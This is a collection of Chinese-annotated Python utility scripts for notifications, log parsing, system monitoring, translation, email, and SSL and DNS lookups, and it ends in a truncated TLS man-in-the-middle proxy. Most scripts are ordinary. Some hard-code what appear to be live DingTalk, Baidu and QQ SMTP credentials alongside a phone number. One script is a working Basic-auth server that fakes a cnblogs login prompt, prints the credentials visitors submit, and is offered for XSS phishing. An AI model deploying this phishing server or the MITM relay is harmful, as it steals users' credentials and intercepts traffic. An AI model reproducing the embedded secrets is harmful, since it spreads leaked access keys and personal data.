封装钉钉通知接口: 调用接口时需要传入被通知人的手机号,调用后会在钉钉群内@并通知该成员.
import requests
import urllib.parse
import time
import hmac
import hashlib
import base64
import json


class DingToken():
    """Send text notifications to a DingTalk group via a signed robot webhook.

    Args:
        atAll: whether every member of the group should be @-mentioned.
        atMobiles: phone number (str) or iterable of phone numbers to @-mention.
    """

    # NOTE(review): the signing secret and access token are committed in source.
    # They are kept here so existing callers keep working, but they should be
    # rotated and loaded from configuration instead.
    _SECRET = 'SEC1018485caf7339e38530b4923ef3cfa164d03af6a79105af0013246048479bf1'
    _ACCESS_TOKEN = '0fe10f5f4e8dd74e6b90afb2f74b2b8a8aaa3bf246dccfead9d7395a56fae586'
    _ENDPOINT = 'https://oapi.dingtalk.com/robot/send'

    def __init__(self, atAll, atMobiles):
        self.atAll = atAll
        self.atMobiles = atMobiles

    def _signature(self, timestamp):
        """Return the URL-quoted HMAC-SHA256 signature for *timestamp*."""
        string_to_sign = '{}\n{}'.format(timestamp, self._SECRET)
        hmac_code = hmac.new(
            self._SECRET.encode('utf-8'),
            string_to_sign.encode('utf-8'),
            digestmod=hashlib.sha256,
        ).digest()
        return urllib.parse.quote(base64.b64encode(hmac_code))

    def send_message(self, message):
        """Post *message* as a text message and return the HTTP response."""
        timestamp = str(round(time.time() * 1000))
        # The query separator before "timestamp" must be a literal '&'.
        webhook = (self._ENDPOINT
                   + '?access_token=' + self._ACCESS_TOKEN
                   + '&timestamp=' + timestamp
                   + '&sign=' + self._signature(timestamp))

        # Accept a single number or several without nesting lists.
        if isinstance(self.atMobiles, str):
            mobiles = [self.atMobiles]
        else:
            mobiles = list(self.atMobiles)

        data = {
            "msgtype": "text",
            "text": {"content": message},
            "at": {"atMobiles": mobiles, "isAtAll": self.atAll},
        }
        headers = {'Content-Type': 'application/json'}
        # A timeout keeps a stalled connection from blocking the caller forever.
        return requests.post(webhook, data=json.dumps(data),
                             headers=headers, timeout=10)

    def send_warning(self, platform, address, send_date, message):
        """Send a formatted alert banner followed by *message*."""
        return self.send_message(
            "------------------------------------------------------- \n"
            "\t {0} \n"
            "------------------------------------------------------- \n"
            "系统地址: \t {1} \n"
            "告警日期: \t {2} \n"
            "------------------------------------------------------- \n"
            "{3}"
            "-------------------------------------------------------".format(
                platform, address, send_date, message)
        )


if __name__ == "__main__":
    ding = DingToken(False, "15646596977")
    ding.send_warning("总部客服(呼叫中心)", "192.168.1.1", "2021:01:01", "hello lyshark \n")
计算范围时间戳: 编程实现在日志文件中提取出指定时间之内对应系统数据,用于通过时间戳定位时间区间.
import sys, os, time
import logging, datetime
import ast


def Write_Dictionaries(LogName, Dict):
    """Append ``str(Dict)`` to *LogName* as a timestamped INFO record.

    Each record has the shape
    ``<epoch> --> <level> --> <YYYY-mm-dd HH:MM:SS> --> <message>``.
    ``logging.basicConfig`` only takes effect the first time it configures the
    root logger, so the first *LogName* passed in a process wins.
    """
    logging.basicConfig(
        level=logging.DEBUG,
        format="%(created)d --> %(levelname)s --> %(asctime)s --> %(message)s",
        datefmt="%Y-%m-%d %H:%M:%S",
        filename=LogName,
        filemode="a+",
    )
    logging.info(str(Dict))


def Read_Dictionaries(LogName, Start_Time, End_Time):
    """Return the dictionaries logged between *Start_Time* and *End_Time*.

    Args:
        LogName: path of a log file produced by ``Write_Dictionaries``.
        Start_Time: inclusive lower bound, ``"%Y-%m-%d %H:%M:%S"`` local time.
        End_Time: inclusive upper bound, same format.

    Returns:
        A list of the decoded record payloads, in file order. Lines that are
        not in the expected format, or whose payload is not a Python literal,
        are skipped.
    """
    time_format = "%Y-%m-%d %H:%M:%S"
    find_time_stamp = []
    with open(LogName, "r", encoding="utf-8") as fp:
        start = int(time.mktime(time.strptime(Start_Time, time_format)))
        end = int(time.mktime(time.strptime(End_Time, time_format)))
        for line in fp:
            # maxsplit keeps a payload that itself contains " --> " intact.
            fields = line.rstrip("\n").split(" --> ", 3)
            if len(fields) < 4:
                continue
            try:
                stamp = int(fields[0])
            except ValueError:
                continue
            if not start <= stamp <= end:
                continue
            try:
                # literal_eval only accepts literals, so a crafted log line
                # cannot execute code the way eval() would.
                find_time_stamp.append(ast.literal_eval(fields[3]))
            except (ValueError, SyntaxError):
                continue
    return find_time_stamp


if __name__ == "__main__":
    # NOTE(review): range(1, 0) is empty, so nothing is written here and
    # addr.log must already exist — confirm whether this is intentional.
    for item in range(1, 0):
        dic = {"Address": "192.168.1.1", "CPU": str(item), "MEM": str(item * 10), "IO": str(item / 2)}
        Write_Dictionaries("addr.log", dic)
        time.sleep(1)
        print("写入内容: {}".format(dic))

    find_dict = Read_Dictionaries("addr.log", "2020-03-19 16:10:43", "2020-03-19 16:10:54")
    for item in find_dict:
        print("IP地址: {} CPU负载: {}".format(item.get("Address"), item.get("CPU")))
两个文本差异比对: 使用Python内置的模块就可以完成两个文件的差异比对,最后生成html表格方便展示.
import difflib
import argparse
import sys


def readfile(filename):
    """Return the lines of *filename* without line endings.

    Prints the error and exits the process with status 1 when the file cannot
    be read.
    """
    try:
        with open(filename, 'r') as fileHandle:
            return fileHandle.read().splitlines()
    except IOError as e:
        print("Read file Error:", e)
        # A non-zero status lets shells and CI see the failure.
        sys.exit(1)


def diff_file(filename1, filename2, output='result.html'):
    """Write a side-by-side HTML diff of two text files.

    Args:
        filename1: path of the "from" file.
        filename2: path of the "to" file.
        output: path of the HTML report (defaults to ``result.html``).
    """
    text1_lines = readfile(filename1)
    text2_lines = readfile(filename2)
    result = difflib.HtmlDiff().make_file(
        text1_lines, text2_lines, filename1, filename2, context=True)
    # make_file() declares charset utf-8 in the page by default, so the file
    # must be written as UTF-8 regardless of the platform's locale encoding.
    with open(output, 'w', encoding='utf-8') as resultfile:
        resultfile.write(result)


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="传入两个文件参数")
    parser.add_argument('-f1', action='store', dest='filename1', required=True)
    parser.add_argument('-f2', action='store', dest='filename2', required=True)
    given_args = parser.parse_args()
    diff_file(given_args.filename1, given_args.filename2)
计算指定网段IP数量: 例如输入网段192.168.1.1/100则计算出这个网段范围内的所有主机数.
import os


def CalculationIP(Addr_Count):
    """Expand ``"a.b.c.START/END"`` into every address from START to END.

    The part after the slash is the last value of the final octet, not a CIDR
    prefix length: ``"192.168.1.1/3"`` yields ``.1``, ``.2`` and ``.3``.

    Args:
        Addr_Count: range expression such as ``"192.168.1.1/100"``.

    Returns:
        The list of dotted addresses, or an empty list when the expression
        cannot be parsed. An empty list keeps the result iterable and falsy,
        so callers can loop over it or test it directly.
    """
    try:
        pieces = Addr_Count.split("/")
        octets = str(pieces[0]).split(".")
        prefix = octets[0] + "." + octets[1] + "." + octets[2] + "."
        first = int(Addr_Count.split(".")[3].split("/")[0])
        last = int(pieces[1])
    except (AttributeError, IndexError, TypeError, ValueError):
        return []
    return [prefix + str(host) for host in range(first, last + 1)]


if __name__ == "__main__":
    ret = CalculationIP("192.168.1.1/100")
    for address in ret:
        print("地址范围内的所有IP: {}".format(address))
使用PSutil库提取数据: 通过使用第三方工具库,提取出系统中的网络连接请求与进程线程的详细数据.
import psutil


def GetNetwork():
    """Print per-interface byte and packet counters."""
    network = psutil.net_io_counters(pernic=True, nowrap=True)
    for name, stats in network.items():
        print("[*] 网卡: %-35s 发送/接收字节: %s/%s 发送/接收包数量: %s/%s"
              % (name, stats.bytes_sent, stats.bytes_recv,
                 stats.packets_sent, stats.packets_recv))


def GetNetworkLink():
    """Print and return the processes owning ESTABLISHED/LISTEN TCP sockets.

    Returns:
        A list of ``[process_name, local_port]`` pairs.
    """
    AllowData = []
    for each in psutil.net_connections(kind="tcp"):
        if each.status not in ("ESTABLISHED", "LISTEN"):
            continue
        src_addr, src_port = each.laddr.ip, each.laddr.port
        src_pid = each.pid
        # psutil.Process(None) means "the current process", so a connection
        # whose owner is hidden would be attributed to this script.
        if src_pid is None:
            continue
        try:
            name = psutil.Process(src_pid).name()
        except psutil.Error:
            # The owner exited or is not accessible to this user.
            continue
        print("[+] IP地址: %15s:%-5s PID: %5s 名称: %-10s" % (src_addr, src_port, src_pid, name))
        AllowData.append([name, src_port])
    return AllowData


def GetProcessID():
    """Print thread, memory, CPU, I/O and socket details for every process.

    Processes that disappear or deny access while being inspected are skipped.
    """
    for each in psutil.pids():
        try:
            p = psutil.Process(int(each))
            # Collect everything first so a failure prints no partial record.
            summary = (p.name(), p.num_threads(), int(p.memory_percent()), p.create_time())
            cpu_times = p.cpu_times()
            memory_info = p.memory_info()
            io_counters = p.io_counters()
            connections = p.connections()
        except psutil.Error:
            continue
        print("-" * 100)
        print("进程: %25s 线程数: %5s 内存利用率:%3s 进程创建时间: %-20s" % summary)
        print("-" * 100)
        print("CPU时间信息: {}".format(cpu_times))
        print("MEM内存信息: {}".format(memory_info))
        print("进程IO读写参数: {}".format(io_counters))
        print("进程对外SOCKET: {}".format(connections))
        print("\r" * 100)
简单实现密码登录验证: 在不使用数据库的情况下完成密码验证,密码的hash值对应的是123123
import os, time
import hashlib

# In-memory account table. "pass" is the hex MD5 of the password and "Flag"
# is the failed-attempt counter, stored as a decimal string.
# NOTE(review): unsalted MD5 is not suitable for real password storage.
db = [
    {"user": "admin", "pass": "4297f44b13955235245b2497399d7a93", "Flag": "0"},
    {"user": "guest", "pass": "4297f44b13955235245b2497399d7a93", "Flag": "0"},
    {"user": "lyshark", "pass": "4297f44b13955235245b2497399d7a93", "Flag": "0"}
]


def CheckUser(username, password):
    """Validate a login attempt against ``db``.

    An account is locked once its failure counter reaches 5; a successful
    login resets the counter.

    Args:
        username: account name to look up.
        password: plaintext password supplied by the user.

    Returns:
        1 on success, 0 for a wrong password, unknown user or locked account.
    """
    for record in db:
        if record.get("user") != username:
            continue
        # Compare numerically: the counter is stored as a string.
        if int(record.get("Flag")) >= 5:
            print("用户 {} 被永久限制登录".format(record.get("user")))
            return 0
        digest = hashlib.md5(bytes(password, encoding="utf-8")).hexdigest()
        if record.get("pass") == digest:
            # Keep the counter a string so later comparisons stay valid.
            record['Flag'] = "0"
            return 1
        record['Flag'] = str(int(record['Flag']) + 1)
        return 0
    return 0


if __name__ == "__main__":
    while True:
        username = input("输入用户名: ")
        password = input("输入密码: ")
        ret = CheckUser(username, password)
        print("登录状态:", ret)
SQLite提取数据并绘图: 通过使用matplotlib这个库,提取出指定时间段内的数据记录,然后直接绘制曲线图.
import os, time, datetime
import sqlite3
import numpy as np
from matplotlib import pyplot as plt


def TimeIndex(db, table, start, ends):
    """Return the rows of *table* whose ``time`` column lies in a time window.

    Args:
        db: path of the SQLite database file.
        table: table name. It is interpolated into the statement because SQL
            identifiers cannot be bound as parameters, so it must come from a
            trusted source.
        start: inclusive lower bound, ``"%Y-%m-%d %H:%M:%S"`` local time.
        ends: inclusive upper bound, same format.

    Returns:
        A list of row tuples.
    """
    time_format = "%Y-%m-%d %H:%M:%S"
    start_time = int(time.mktime(time.strptime(start, time_format)))
    end_time = int(time.mktime(time.strptime(ends, time_format)))
    conn = sqlite3.connect(db)
    try:
        select = "select * from {} where time >= ? and time <= ?".format(table)
        return conn.execute(select, (start_time, end_time)).fetchall()
    finally:
        # Release the database handle even when the query fails.
        conn.close()


def Display():
    """Plot the second column of the selected rows against itself."""
    rows = TimeIndex("data.db", "lyshark", "2019-12-12 14:28:00", "2019-12-12 14:29:00")
    values = [row[1] for row in rows]
    plt.title("CPU Count")
    plt.plot(values, values)
    plt.show()


if __name__ == "__main__":
    Display()
将图片转为字符图片: 通过pillow图片处理库对图片进行扫描,然后用特殊字符替换图片的每一个像素,生成字符图片.
from PIL import Image
import argparse


def get_char(r, g, b, alpha=256):
    """Map one pixel to a character by its luminance.

    Args:
        r, g, b: colour channels in the range 0-255.
        alpha: opacity; a value of 0 always maps to a space.

    Returns:
        A single character from the palette.
    """
    ascii_char = list("~!@#$%^&*()_+ ")
    if alpha == 0:
        return " "
    length = len(ascii_char)
    gray = int(0.2126 * r + 0.7152 * g + 0.0722 * b)
    # Slightly more than 256 levels so gray == 255 stays inside the palette.
    unit = (256.0 + 1) / length
    return ascii_char[int(gray / unit)]


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("--file", dest="file", help="指定一个图片文件")
    parser.add_argument("--width", dest="width", type=int, default=50, help="指定图片宽度")
    parser.add_argument("--height", dest="height", type=int, default=25, help="指定图片高度")
    args = parser.parse_args()

    if args.file is not None:
        # Normalise to RGBA so getpixel() always yields (r, g, b, a);
        # palette, greyscale and CMYK images otherwise break the unpacking.
        img = Image.open(args.file).convert("RGBA")
        img = img.resize((args.width, args.height), Image.NEAREST)
        rows = []
        for row in range(args.height):
            chars = [get_char(*img.getpixel((col, row))) for col in range(args.width)]
            rows.append("".join(chars) + "\n")
        print("".join(rows))
    else:
        parser.print_help()
针对视频转为字符串: 通过opencv库实现对指定MP4文件替换为字符串格式,并播放出来.
import cv2, os, argparse


def PlayCharMP4(file_name, heigth, width):
    """Convert a video to character frames and print them in sequence.

    Every frame is converted first and kept in memory, then the frames are
    printed one after another with the terminal cleared in between.

    Args:
        file_name: path of the video file.
        heigth: number of text rows per frame.
        width: number of characters per row.
    """
    ascii_char = list("~!@#$%^&*()_+/-,.;:'{}[]=qwertyuiokjhgfd")
    char_len = len(ascii_char)

    vc = cv2.VideoCapture(file_name)
    frame_count, outputList = 0, []
    try:
        if vc.isOpened():
            rval, frame = vc.read()
        else:
            rval = False
        while rval:
            gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
            gray = cv2.resize(gray, (width, heigth))
            lines = []
            for pixel_line in gray:
                lines.append("".join(
                    ascii_char[int(pixel / 256 * char_len)] for pixel in pixel_line))
            outputList.append("".join(line + "\n" for line in lines))
            frame_count = frame_count + 1
            if frame_count % 100 == 0:
                print("处理视频: " + str(frame_count) + " 帧")
            rval, frame = vc.read()
    finally:
        # Free the decoder and file handle even if conversion fails.
        vc.release()

    # "cls" only exists on Windows; other platforms use "clear".
    clear_command = "cls" if os.name == "nt" else "clear"
    for frame in outputList:
        os.system(clear_command)
        print(frame)


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("--file", dest="file", help="指定一个MP4文件")
    args = parser.parse_args()
    if args.file is not None:
        PlayCharMP4(args.file, 30, 80)
    else:
        parser.print_help()
调用百度翻译API: 调用百度翻译API完成翻译任务.
import requests
import string
import time
import hashlib
import json

api_url = "http://api.fanyi.baidu.com/api/trans/vip/translate"
# NOTE(review): the application id and key are committed in source; they
# should be loaded from configuration and rotated.
my_appid = "20220303001108300"
cyber = "pZmk93BeezwigjmjkOYS"
lower_case = list(string.ascii_lowercase)


def requests_for_dst(word):
    """Translate *word* with the Baidu translate API and print the result.

    Text starting with a lowercase ASCII letter is translated from English to
    Chinese; anything else from Chinese to English.

    Args:
        word: text to translate. Empty input is ignored.
    """
    if not word:
        return

    salt = str(time.time())[:10]
    final_sign = str(my_appid) + word + salt + cyber
    final_sign = hashlib.md5(final_sign.encode("utf-8")).hexdigest()

    if word[0] in lower_case:
        source, target = 'en', 'zh'
    else:
        source, target = 'zh', 'en'

    paramas = {
        'q': word,
        'from': source,
        'to': target,
        'appid': '%s' % my_appid,
        'salt': '%s' % salt,
        'sign': '%s' % final_sign,
    }
    response = requests.get(api_url, params=paramas, timeout=10).content
    json_reads = json.loads(str(response, encoding="utf-8"))

    results = json_reads.get('trans_result')
    if not results:
        # Failure payloads carry error_code/error_msg instead of a result.
        print("[-] 翻译失败: {}".format(json_reads.get('error_msg', json_reads)))
        return
    print(results[0]['dst'])


if __name__ == "__main__":
    while True:
        word = input("输入文本 -> ")
        requests_for_dst(word)
统计网站访问日志: 实现统计网站访问日志,并得到字典类型返回值.
import os, json
from collections import Counter


def _count_field(file, index, clean=None):
    """Count the values of whitespace-separated field *index* over all lines."""
    counts = Counter()
    with open(file) as f:
        for line in f:
            fields = line.split()
            # Blank or truncated lines do not carry the field; skip them.
            if len(fields) <= index:
                continue
            value = fields[index]
            counts[clean(value) if clean else value] += 1
    return dict(counts)


def Count_Flag_And_Flow(file):
    """Return ``{value: occurrences}`` for the 9th field of each log line."""
    return _count_field(file, 8)


def Count_Flag_And_Type(file):
    """Return ``{value: occurrences}`` for the 13th field, parentheses removed."""
    return _count_field(file, 12, lambda text: text.replace("(", "").replace(")", ""))


def Count_Time_And_Flow(file):
    """Sum the 10th field (a byte count) per ``HH:MM`` bucket.

    The bucket is built from the second and third ``:``-separated parts of the
    4th field. Lines whose size is ``-``/``"-"``, not an integer, or that are
    too short are ignored.

    Returns:
        ``{"HH:MM": total_bytes}``.
    """
    flow = {}
    with open(file) as f:
        for line in f:
            fields = line.split()
            if len(fields) < 10:
                continue
            size = fields[9]
            if size == "-" or size == '"-"':
                continue
            stamp = fields[3].split(":")
            if len(stamp) < 3:
                continue
            try:
                amount = int(size)
            except ValueError:
                continue
            ip_attr = stamp[1] + ":" + stamp[2]
            flow[ip_attr] = flow.get(ip_attr, 0) + amount
    return flow


if __name__ == "__main__":
    Address = Count_Flag_And_Flow("d://access.log")
    print(Address)
    Types = Count_Flag_And_Type("d://access.log")
    print(Types)
    OutFlow = Count_Time_And_Flow("d://access.log")
    print(OutFlow)
SMTPlib发送邮件: 简单封装一个SMTP邮件发送功能,传值即可直接使用.
import smtplib
from email.mime.text import MIMEText

mail_host = 'smtp.qq.com'
mail_user = '1181506874@qq.com'
# NOTE(review): the SMTP authorisation code is committed in source; load it
# from configuration and rotate it.
mail_pass = 'wrpmzkalqqvhhijc'


def SendMail(sender_user, recivers_user, title, subject, is_ssl=False):
    """Send one HTML e-mail through ``mail_host``.

    Args:
        sender_user: address placed in the ``From`` header and SMTP envelope.
        recivers_user: recipient address.
        title: value of the ``Subject`` header.
        subject: HTML body of the message.
        is_ssl: connect with implicit TLS (``SMTP_SSL``) when truthy,
            otherwise use plain SMTP on port 25.

    Returns:
        True when the message was handed to the server, False on any SMTP or
        connection error.
    """
    sender = sender_user
    receivers = [recivers_user]
    message = MIMEText(subject, 'html', 'utf-8')
    message['Subject'] = title
    message['From'] = sender
    message['To'] = receivers[0]

    smtpObj = None
    try:
        if is_ssl:
            # Open only the TLS connection; no throw-away plaintext one.
            smtpObj = smtplib.SMTP_SSL(mail_host)
        else:
            smtpObj = smtplib.SMTP(mail_host, 25)
        smtpObj.login(mail_user, mail_pass)
        smtpObj.sendmail(sender, receivers, message.as_string())
        return True
    except (smtplib.SMTPException, OSError):
        # OSError covers refused connections, DNS failures and timeouts.
        return False
    finally:
        if smtpObj is not None:
            try:
                smtpObj.quit()
            except (smtplib.SMTPException, OSError):
                smtpObj.close()


if __name__ == "__main__":
    ref = SendMail("1181506874@qq.com", "lysharks@163.com", "Flask 邮箱验证码",
                   "<p>您本次的验证码是: 1Ae3 有效期10分钟. </p><br><br> "
                   "更多内容请访问: <a href='https://www.baidu.com'>www.baidu.com</a>", False)
    print(ref)
构建简易HTTPBasic认证: Basic认证是由web服务器提供的一种轻便的身份校验方式,此处实现的工具可用于XSS内嵌钓鱼.
import socketserver
import http.server

# NOTE(review): this handler prompts visitors for HTTP Basic credentials under
# a realm naming a third-party site and prints whatever they submit. Running
# it against users who have not agreed to a security test is credential
# phishing; keep it to authorised exercises only.
# NOTE(review): block nesting below was reconstructed from a
# whitespace-collapsed source — confirm against the original file.
class RequestHandler(http.server.SimpleHTTPRequestHandler):
    """GET handler that issues a Basic-auth challenge and logs the reply."""

    def do_GET(self):
        """Answer a GET according to the cookie / Authorization headers.

        * request headers contain ``UserLogin=1``: redirect (302) to the
          sign-in URL.
        * request headers contain ``Authorization: Basic ``: set the
          ``UserLogin=1`` cookie, redirect, and print the request headers.
        * otherwise: reply 401 with a ``WWW-Authenticate`` challenge.
        """
        # find() > 0 is true only when the text occurs after position 0.
        if str(self.headers).find('UserLogin=1') > 0:
            self.send_response(302)
            self.send_header('Location', 'https://account.cnblogs.com/signin')
            self.end_headers()
        else:
            if str(self.headers).find('Authorization: Basic ') > 0:
                self.send_response(302)
                self.send_header('Set-Cookie', 'UserLogin=1')
                self.send_header('Location', 'https://account.cnblogs.com/signin')
                # The printed headers include the submitted Authorization value.
                print("------------------------------------------------------------")
                print(str(self.headers))
            else:
                self.send_response(401)
                self.send_header('Content-type', 'text/html; charset=UTF-8')
                self.send_header('WWW-Authenticate', 'Basic realm="Session Out Of Date, Please Login again [account.cnblogs.com]"')
            self.end_headers()

# Listens on every interface, port 9999, and serves until interrupted.
httpd = socketserver.TCPServer(("0.0.0.0", 9999), RequestHandler)
httpd.serve_forever()
获取SSL证书信息: 通过使用ssl模块,我们可以直接解析出一个网站的SSL证书信息(包括有效期与证书中的DNS名称列表).
import ssl, sys, socket


def _rdn_value(rdns, index):
    """Return the value of the *index*-th name entry, or "-" when absent."""
    try:
        return rdns[index][0][1]
    except (IndexError, TypeError):
        return "-"


def GetSSL_DNS(hostname):
    """Print details of the TLS certificate served by *hostname* on port 443.

    Prints the third subject and issuer name entries, the serial number, the
    validity window and every subjectAltName value. Connection or
    verification failures are reported on stdout instead of being raised.

    Args:
        hostname: DNS name to connect to; surrounding whitespace is ignored.
    """
    host = str(hostname).strip()
    try:
        ctx = ssl.create_default_context()
        # Use the stripped name for SNI too, so it matches the connect target.
        with ctx.wrap_socket(socket.socket(), server_hostname=host) as sock:
            sock.settimeout(5)
            sock.connect((host, 443))
            crt = sock.getpeercert()
    except (OSError, ValueError) as error:
        # ssl.SSLError and socket errors are OSError subclasses.
        print("[-] 获取证书失败: {}".format(error))
        return

    # Name entries are read by position; shorter names fall back to "-".
    print("组织单位: {}".format(_rdn_value(crt.get("subject", ()), 2)))
    print("通用名: {}".format(_rdn_value(crt.get("issuer", ()), 2)))
    print("序列号: {}".format(crt.get("serialNumber")))
    print("起始时间: {} ".format(crt.get("notBefore")))
    print("终止时间: {} ".format(crt.get("notAfter")))
    print('-------- 针对域名 {} DNS的列表 --------'.format(hostname))
    for item in crt.get('subjectAltName', ()):
        print("DNS: {}".format(item[1]))


if __name__ == "__main__":
    if len(sys.argv) > 1 and sys.argv[1]:
        GetSSL_DNS(sys.argv[1])
    else:
        print("[-] 请输入一个域名: baidu.com")
DNS模块查域名解析: 使用 DNS-Python 这个模块来查询特定的一个或一组域名的所有解析记录.
import os
import dns.resolver
from collections import defaultdict

# dnspython 2.x renamed query() to resolve() and deprecated the old name;
# fall back to query() on 1.x installations.
_resolve = getattr(dns.resolver, "resolve", None) or dns.resolver.query

domain = "baidu.com"

# A records: walk the answer section of the raw response.
A = _resolve(domain, "A")
for x in A.response.answer:
    # Iterating the rrset directly works on both dnspython 1.x and 2.x,
    # whereas the type of ``.items`` changed between them.
    for y in x:
        print("查询到A记录:{} ".format(y))

print("*" * 50)
MX = _resolve(domain, "MX")
for x in MX:
    print("MX交换数值 {} MX记录:{} ".format(x.preference, x.exchange))

print("*" * 50)
NS = _resolve(domain, "NS")
for x in NS.response.answer:
    for y in x:
        print("NS名称服务:{} ".format(y.to_text()))

hosts = ["baidu.com", "weibo.com", "sina.com"]
IP_List = defaultdict(list)


def query(hosts):
    """Resolve the A records of every name in *hosts*.

    Results are appended to the module-level ``IP_List`` mapping, which is
    also returned. Names that fail to resolve are left without entries.

    Args:
        hosts: iterable of DNS names.

    Returns:
        ``IP_List``, mapping each resolved name to its record objects.
    """
    for host in hosts:
        try:
            answers = _resolve(host, "A")
        except dns.exception.DNSException:
            # One unresolvable name should not abort the whole batch.
            continue
        for record in answers:
            IP_List[host].append(record)
    return IP_List


for i in query(hosts):
    print(i, IP_List[i])
解析HTTP服务状态: 通过调用pycurl模块对指定的Web服务器进行健康状态监测.
import pycurl, certifi
from io import BytesIO

headers = ['Accept:*/*', 'User-Agent:Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0']


def header_function(header_line):
    """Receive one raw response header line; the decoded text is discarded."""
    # iso-8859-1 maps every byte, so decoding can never raise inside the
    # transfer callback.
    header_line = header_line.decode("iso-8859-1")


class ex_response(object):
    """Fetch a URL with pycurl and report the transfer's timing statistics."""

    def __init__(self, url):
        """Perform the request for *url* immediately.

        A failed transfer is remembered in ``self.error`` and both the buffer
        and the curl handle are closed.
        """
        self.error = None
        self.buffer = BytesIO()
        self.c = pycurl.Curl()
        self.c.setopt(pycurl.URL, url)
        self.c.setopt(pycurl.CAINFO, certifi.where())
        self.c.setopt(pycurl.WRITEDATA, self.buffer)
        self.c.setopt(pycurl.WRITEHEADER, self.buffer)
        self.c.setopt(self.c.HTTPHEADER, headers)
        self.c.setopt(pycurl.HEADERFUNCTION, header_function)
        try:
            self.c.perform()
        except pycurl.error as error:
            self.error = error
            self.buffer.close()
            self.c.close()

    def getinfo(self):
        """Print status code, phase timings, sizes and speeds, then clean up.

        When the transfer failed, prints the stored error instead, because
        the curl handle is already closed and cannot be queried.
        """
        if self.error is not None:
            print("[-] 请求失败: {}".format(self.error))
            return

        h1 = self.c.getinfo(pycurl.HTTP_CODE)
        h2 = self.c.getinfo(pycurl.TOTAL_TIME)
        h3 = self.c.getinfo(pycurl.NAMELOOKUP_TIME)
        h4 = self.c.getinfo(pycurl.CONNECT_TIME)
        h5 = self.c.getinfo(pycurl.PRETRANSFER_TIME)
        h6 = self.c.getinfo(pycurl.STARTTRANSFER_TIME)
        h7 = self.c.getinfo(pycurl.REDIRECT_TIME)
        h8 = self.c.getinfo(pycurl.SIZE_UPLOAD)
        h9 = self.c.getinfo(pycurl.SIZE_DOWNLOAD)
        h10 = self.c.getinfo(pycurl.SPEED_DOWNLOAD)
        h11 = self.c.getinfo(pycurl.SPEED_UPLOAD)
        h12 = self.c.getinfo(pycurl.HEADER_SIZE)
        # Time values are multiplied by 1000 before being labelled "ms".
        info = ''' http状态码:%s 传输结束总时间:%.2f ms DNS解析时间:%.2f ms 建立连接时间:%.2f ms 准备传输时间:%.2f ms 传输开始时间:%.2f ms 重定向时间:%.2f ms 上传数据包大小:%d bytes/s 下载数据包大小:%d bytes/s 平均下载速度:%d bytes/s 平均上传速度:%d bytes/s http头文件大小:%d byte ''' % (h1, h2 * 1000, h3 * 1000, h4 * 1000, h5 * 1000, h6 * 1000, h7 * 1000, h8, h9, h10, h11, h12)
        print(info)
        self.buffer.close()
        self.c.close()


if __name__ == "__main__":
    curl_respon = ex_response("https://www.baidu.com")
    curl_respon.getinfo()
模拟Proxy实现MITM: 假设已经获取server端和客户端的证书,此脚本可以伪造客户端和服务端,实现MITM的场景。
import socket
import ssl
import threading
import queue
import time

# NOTE(review): this relays and TLS-terminates traffic between two local
# endpoints using certificates for both sides; use only in a lab you control.
# NOTE(review): block nesting was reconstructed from a whitespace-collapsed
# source — confirm the loop/branch structure against the original file.

# Data read from the downstream client, waiting to be sent to the server.
fromCliQueue = queue.Queue()
# Data read from the upstream server, waiting to be sent to the client.
fromSrvQueue = queue.Queue()
sFlag = False

class proxyClient (threading.Thread):
    """Thread that talks to the upstream server at 127.0.0.1:9999."""

    def __init__ (self ):
        """Prepare a client-side TLS context; the socket is created lazily."""
        threading.Thread.__init__(self)
        self.sock = None
        self.ssl_context = ssl.create_default_context(cafile='RootCA.pem' )
        self.ssl_context.load_cert_chain("Client.pem" , "Client.key" )
        # NOTE(review): SSLContext.protocol is documented as read-only, so this
        # assignment presumably raises AttributeError — confirm.
        self.ssl_context.protocol = ssl.PROTOCOL_TLSv1_2
        self.ssl_context.check_hostname = False

    def run (self ):
        """Forward queued client data upstream and queue the replies."""
        global fromCliQueue
        global fromSrvQueue
        while True :
            if not fromCliQueue.empty():
                if self.sock is None :
                    # First pending data: open the upstream connection; the
                    # data itself is sent on the next loop iteration.
                    self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0 )
                    self.sock.connect(('127.0.0.1' , 9999 ))
                else :
                    sdata = fromCliQueue.get()
                    print ("[proxyClient]send to server: {}" .format (sdata))
                    self.sock.send(sdata)
                    rdata = self.sock.recv(4096 )
                    if rdata != b'' :
                        print ("[proxyClient]recv from server: {}" .format (rdata))
                        fromSrvQueue.put(rdata)
                        self.sslDetected(rdata)

    def sslDetected (self, data ):
        """Wrap the upstream socket in TLS when *data* contains the marker.

        Returns True when the socket was wrapped, False otherwise.
        """
        if b'\x01\x00\x00\x00' in data:
            self.sock = self.ssl_context.wrap_socket(self.sock)
            print ("[proxyClient]ssl neogotiation" )
            return True
        else :
            return False

class proxyServer (threading.Thread):
    """Thread that accepts one downstream client on 127.0.0.1:8888."""

    def __init__ (self ):
        """Bind the listening socket and prepare a server-side TLS context."""
        threading.Thread.__init__(self)
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0 )
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1 )
        self.sock.bind(('127.0.0.1' ,8888 ))
        self.sock.listen(1 )
        self.ssl_context = ssl.SSLContext()
        self.ssl_context.load_verify_locations(cafile='RootCA.pem' )
        # NOTE(review): same read-only attribute concern as in proxyClient.
        self.ssl_context.protocol = ssl.PROTOCOL_TLS_SERVER
        self.ssl_context.load_cert_chain("Server.pem" , "Server.key" )

    def run (self ):
        """Queue data from the client, then wait for and relay one reply."""
        global fromSrvQueue
        global fromCliQueue
        self.proxySocket, addr = self.sock.accept()
        while self.proxySocket:
            rdata = self.proxySocket.recv(4096 )
            if rdata != b'' :
                print ("[proxyServer]recv from client: {}" .format (rdata))
                fromCliQueue.put(rdata)
                # Poll once per second until the upstream reply is available.
                while True :
                    if fromSrvQueue.empty():
                        time.sleep(1 )
                        continue
                    else :
                        sdata = fromSrvQueue.get()
                        print ("[proxyServer]send to client: {}" .format (sdata))
                        self.proxySocket.send(sdata)
                        self.sslDetected(sdata)
                        break ;

    def sslDetected (self, data ):
        """Wrap the client socket in server-side TLS when the marker is seen.

